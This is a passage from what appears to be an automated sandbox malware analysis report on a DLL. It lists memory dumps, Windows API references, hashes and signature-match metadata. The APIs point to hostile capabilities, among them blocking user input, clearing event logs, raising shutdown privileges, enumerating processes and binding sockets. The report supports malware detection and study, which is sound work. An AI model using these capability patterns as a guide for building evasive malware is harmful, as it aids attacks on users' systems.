                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInitializeInstance
                                                          • String ID: FriendlyName
                                                          • API String ID: 3519745914-3623505368
                                                          • Opcode ID: 61e8a9f583257a81a27f2bd397121991c8e277aade336a3bff62ca7ac66e2cb8
                                                          • Instruction ID: cecdfafdaea8945f0d6e05b015b6355bace826cc94fa0b1d175a53f4daf6acc8
                                                          • Opcode Fuzzy Hash: 61e8a9f583257a81a27f2bd397121991c8e277aade336a3bff62ca7ac66e2cb8
                                                          • Instruction Fuzzy Hash: F7310574244202AFD604CF65CC88F5BB7E9FF89614F148958F549DB250DB74E88A8B62
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 10009C85
                                                          • FindClose.KERNEL32(00000000), ref: 10009D07
                                                          • CloseHandle.KERNEL32(?), ref: 10009D19
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10009D31
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileFind$CreateFirstHandle
                                                          • String ID: p
                                                          • API String ID: 3283578348-2181537457
                                                          • Opcode ID: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                          • Instruction ID: 2b1597b52ddb8eafb0e91e12b29208ebd2643c3ea00a9cd01ad1c39fb074611e
                                                          • Opcode Fuzzy Hash: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                          • Instruction Fuzzy Hash: 7631BC719087019BF324DF28CC45B8FB6D6EBC53A0F25461EF1AA873D4D634D4458B41
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: bindsocket
                                                          • String ID:
                                                          • API String ID: 3370621091-0
                                                          • Opcode ID: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                          • Instruction ID: 8e805546ef113c3ac3a2f35078ac83ca8a84d9fad177171d366f9001e7ac871c
                                                          • Opcode Fuzzy Hash: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                          • Instruction Fuzzy Hash: E8116DB4814311AFE300DF38D8856EABBE4FF89318F444A1DF49CC7290E3B58A458B96
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                          • Process32First.KERNEL32(00000000,?), ref: 10027112
                                                          • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                            • Part of subcall function 10026F40: CreateToolhelp32Snapshot.KERNEL32(00000008,?,00000000,00000000,?,00000074), ref: 10026F67
                                                            • Part of subcall function 10026F40: Module32First.KERNEL32(00000000,00000000), ref: 10026F7C
                                                            • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026F9B
                                                            • Part of subcall function 10026F40: Module32Next.KERNEL32(00000000,00000000), ref: 10026FA7
                                                            • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026FB9
                                                            • Part of subcall function 10026F40: CloseHandle.KERNEL32(00000000), ref: 10026FC4
                                                          • Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFirstHandleModule32NextProcess32SnapshotToolhelp32lstrcmpi
                                                          • String ID:
                                                          • API String ID: 1584622316-0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: exitfprintf
                                                          • String ID: %s
                                                          • API String ID: 4243785698-620797490
                                                          APIs
                                                          • BlockInput.USER32(00000000), ref: 1001750C
                                                          • BlockInput.USER32(?,?,?,00000000), ref: 10017528
                                                          • BlockInput.USER32(?), ref: 100175D3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          APIs
                                                            • Part of subcall function 100089F0: lstrlenA.KERNEL32(?), ref: 10008A21
                                                            • Part of subcall function 100089F0: malloc.MSVCRT ref: 10008A29
                                                            • Part of subcall function 100089F0: lstrcpyA.KERNEL32(00000000,?), ref: 10008A41
                                                            • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A6D
                                                            • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A8B
                                                            • Part of subcall function 100089F0: GetFileAttributesA.KERNEL32(00000000), ref: 10008ACF
                                                            • Part of subcall function 100089F0: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10008ADC
                                                            • Part of subcall function 100089F0: GetLastError.KERNEL32 ref: 10008AE6
                                                            • Part of subcall function 100089F0: free.MSVCRT ref: 10008B44
                                                          • FindFirstFileA.KERNEL32(?,?,00000041,00000000,00000000,00000001,?,?,00000000,00000065), ref: 10009BDA
                                                          • FindClose.KERNEL32(00000000,0000006D,?,00000000,00000065), ref: 10009C06
                                                          • FindClose.KERNEL32(00000000,?,00000000,00000065), ref: 10009C21
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: Find$CharCloseFileNext$AttributesCreateDirectoryErrorFirstLastfreelstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 887710168-0
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                          • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          APIs
                                                          • OpenEventLogA.ADVAPI32(00000000), ref: 1000E57C
                                                          • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000E587
                                                          • CloseEventLog.ADVAPI32(00000000), ref: 1000E58A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: Event$ClearCloseOpen
                                                          • String ID:
                                                          • API String ID: 1391105993-0
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 10010656
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3672536310-3733053543
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2$?
                                                          • API String ID: 0-2669683831
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U,E
                                                          • API String ID: 0-4027942359
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Similarity
                                                          • API ID: sprintf
                                                          • String ID:
                                                          • API String ID: 590974362-0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 91662ec1cff2479ffb4d0807e694abe4bd9433d31a24d6642f7bb7654cd80fd5
                                                          • Instruction ID: 6d153d7317b443229e76589623fbd87a7527c5a4b9c51e2e973f172cac6381ac
                                                          • Opcode Fuzzy Hash: 91662ec1cff2479ffb4d0807e694abe4bd9433d31a24d6642f7bb7654cd80fd5
                                                          • Instruction Fuzzy Hash: A97225B56087009FD358CF28CC85A6BB7E6FBC8304F14892DF99A87355EA74E901DB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                          • Instruction ID: 187d62c811851c58088b2f1c6dce946c8a0fd3b94e8cc69681fc47f369cecc54
                                                          • Opcode Fuzzy Hash: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                          • Instruction Fuzzy Hash: 5F824AB5A042459FC758CF18C880AAAFBE5FF88344F14866EE949CB356D770E981CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p
                                                          • API String ID: 0-2181537457
                                                          • Opcode ID: 9caf1df689a19b956391ec3c576a82a667aa8e6862b503aa0cf29b2fd44b838f
                                                          • Instruction ID: 45b6a046e3b77afb10071db13243d179a9482f48ba136c0af4373135af33ec65
                                                          • Opcode Fuzzy Hash: 9caf1df689a19b956391ec3c576a82a667aa8e6862b503aa0cf29b2fd44b838f
                                                          • Instruction Fuzzy Hash: D27223756087019FD358CF28CC95A6BB7E5EBC8304F04892EFA9A87351EB35E904DB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: P
                                                          • API String ID: 0-3110715001
                                                          • Opcode ID: dcee423a1f63492412fbcbb5a9b3a38f1c6a8fa19ce02aef3e3991b4b20f5f9a
                                                          • Instruction ID: 33aae577ea905f5ad56b9f357bc3e0a8a7789616b4bc9bd581e9d512b627a041
                                                          • Opcode Fuzzy Hash: dcee423a1f63492412fbcbb5a9b3a38f1c6a8fa19ce02aef3e3991b4b20f5f9a
                                                          • Instruction Fuzzy Hash: 075238B56047019FD358CF28C885AABB7EAFBC8340F15892DF98A87351EB74E905CB51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _ftol
                                                          • String ID:
                                                          • API String ID: 2545261903-0
                                                          • Opcode ID: cdf9305ae9bd88c9371b9d2d824252dc713467f3f5229e8f155bee12b74ec04b
                                                          • Instruction ID: 93d2e9e2bcb9c4188201fd4b42363bbb7b16d0fef9119353a7c3b7c5588b8c6c
                                                          • Opcode Fuzzy Hash: cdf9305ae9bd88c9371b9d2d824252dc713467f3f5229e8f155bee12b74ec04b
                                                          • Instruction Fuzzy Hash: 3A221974A043868FD768CF18C490B9AB7E2FFC8344F11896EE9898B355D730E951CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p
                                                          • API String ID: 0-2181537457
                                                          • Opcode ID: ba33a32deeaccc3899d27b0f850914543690927a8c14e2df23edbb532c4b1236
                                                          • Instruction ID: 0900c8e57bf490683d2b7e3c05d321bc10fef181ac1c5a3057966d3bd183a4f1
                                                          • Opcode Fuzzy Hash: ba33a32deeaccc3899d27b0f850914543690927a8c14e2df23edbb532c4b1236
                                                          • Instruction Fuzzy Hash: C32213766047009FD358CF68C885AABB7E9FB88304F05891DF99AC7351EB74E904DB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                          • Instruction ID: 1973868626951cbc4e1e6dbbbaae98c5aea718cf2aa9e198ecfd8e57a8fac991
                                                          • Opcode Fuzzy Hash: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                          • Instruction Fuzzy Hash: 4722F1B5A142059FCB48CF18C490A9ABBE5FF88310F558A6EFC49CB346D770E941CB91
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                          • Instruction ID: f9911c3756e58d96d67ac0068ac05fe94daea12ae19a9087e13a65d9dc3f6b02
                                                          • Opcode Fuzzy Hash: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                          • Instruction Fuzzy Hash: 9F626D74600B428FD734CF29D980A26B7E1FF85650B158A2DE887D7B51D730F94ACBA1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                          • Instruction ID: 752e0dd24e133d73b6f08329f2179d760a74bb4bde05081f5036a7f9d25ca0bd
                                                          • Opcode Fuzzy Hash: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                          • Instruction Fuzzy Hash: AE423A74504B468FC326CF18D480A6BB7F5FF89345F14496DE9868B712D731EA0ACB92
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                          • Instruction ID: 666f91e0f4e9b9f2dd51f1c7e6263b133853ce75cc250038ad35c0a21c5c6ed6
                                                          • Opcode Fuzzy Hash: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                          • Instruction Fuzzy Hash: 6B02F0B56087458BE704CF28D88071BB7E6EFC5294F46852CF88A87345EB35EE05C7A6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                          • Instruction ID: 41471438a16cbbac6786139d1061e5c3017a9635662bae8005eac138925a0d7c
                                                          • Opcode Fuzzy Hash: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                          • Instruction Fuzzy Hash: CD3203B56042459FCB68CF28C880B9AB7E5FF88304F15866EED499B345D730EA41CF95
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d49f9ca2698f5c9137cb1864a939808f23562bb2cd5f1e57d96b5c5c5110f81
                                                          • Instruction ID: dbc2a979a44d6b80fd49868066b3bfc1fb6366c6d2716e96624389281a0adb47
                                                          • Opcode Fuzzy Hash: 3d49f9ca2698f5c9137cb1864a939808f23562bb2cd5f1e57d96b5c5c5110f81
                                                          • Instruction Fuzzy Hash: 5A122BB56087419FD364CF58C880AABB7EAFBC8304F15892DF59A87354EB70E905CB52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9c4cca09a5c610eebd126c1ed7a7292d4696e687ae0527427cd542b6cc91d4d
                                                          • Instruction ID: a84226c31b0772432b5ebf70dfd77e863e4b193a01ee3793edd7b7329908bd1c
                                                          • Opcode Fuzzy Hash: d9c4cca09a5c610eebd126c1ed7a7292d4696e687ae0527427cd542b6cc91d4d
                                                          • Instruction Fuzzy Hash: BE12D6A5E35FA741E783AAB854424A5F3607FEB140B06AB17FC9070C42FB3AD38E4254
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 373561648ed17f623230584d40b545c58971e2c0c6a1969ba25a6d51b433a622
                                                          • Instruction ID: 6bf080dd21d2c418260dd11eed1b3b6311730e3ee8d8d0daa20e21ca440b09df
                                                          • Opcode Fuzzy Hash: 373561648ed17f623230584d40b545c58971e2c0c6a1969ba25a6d51b433a622
                                                          • Instruction Fuzzy Hash: 800257B4604B458FC326CF18C490A6BB7E5FF89305F154A6DE98A8B712D731F90ACB91
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e2fb3a0990cb8f2fdad2bfe0b8d49da4d09b219bcd50ed853708e3854edc2e9
                                                          • Instruction ID: 029373d71355fbd2ad70396b17303df9a12dee90329dec291bf355f95b858a0e
                                                          • Opcode Fuzzy Hash: 6e2fb3a0990cb8f2fdad2bfe0b8d49da4d09b219bcd50ed853708e3854edc2e9
                                                          • Instruction Fuzzy Hash: D9122874A093418FC315CF09D48094AB7E2FFCC359F598A6DE9885B326DB30B916CB96
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40d6cc66e0b936cdead37ef532d89ee06d34439e23798db7d65ba9872918fda5
                                                          • Instruction ID: ace8e06d0a3442dc2e4d5d93a36c7dda4def718a55803d6bed4ad8f29c8fc085
                                                          • Opcode Fuzzy Hash: 40d6cc66e0b936cdead37ef532d89ee06d34439e23798db7d65ba9872918fda5
                                                          • Instruction Fuzzy Hash: BB026C756087428FC709CF1AC490A5AFBE2FFC8319F19896DD9899B316DB31E906CB41
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a3b1edd6918a6fbb49c5e17d253c2efa91f0bc55c0e6aeb1232c13692f9d9d0
                                                          • Instruction ID: 64735ea465274e5fb1f8591c2231c0b85bce749390d1d6339555928da74c1d0a
                                                          • Opcode Fuzzy Hash: 5a3b1edd6918a6fbb49c5e17d253c2efa91f0bc55c0e6aeb1232c13692f9d9d0
                                                          • Instruction Fuzzy Hash: BFD11639B00B055FD724DE2ACC81BABB3D6EFC4310F00852DEA9B87B92D6B4F9418651
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3164cc545147bd6fcc36361def7e2a971fd9603e6a70d7ac7ed952a751d142aa
                                                          • Instruction ID: 99b1dfc0eadf8ce5e7ea059f80025304a01d0b16e7590e3691273424f6849c3b
                                                          • Opcode Fuzzy Hash: 3164cc545147bd6fcc36361def7e2a971fd9603e6a70d7ac7ed952a751d142aa
                                                          • Instruction Fuzzy Hash: 47E1E6B2A083554FD318CF28C89125AFBE1FBC4340F16866DE8D6DB352D678D946CB89
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                          • Instruction ID: d9b1ff911830af0539c7349bf08e3b2d9740b495c4966d40e324d81a2e3ecd1b
                                                          • Opcode Fuzzy Hash: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                          • Instruction Fuzzy Hash: 52F1BEB65096418FC309CF18D4989E2BBE5EF98310B1F42FDC4499B362D332E985CB91
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
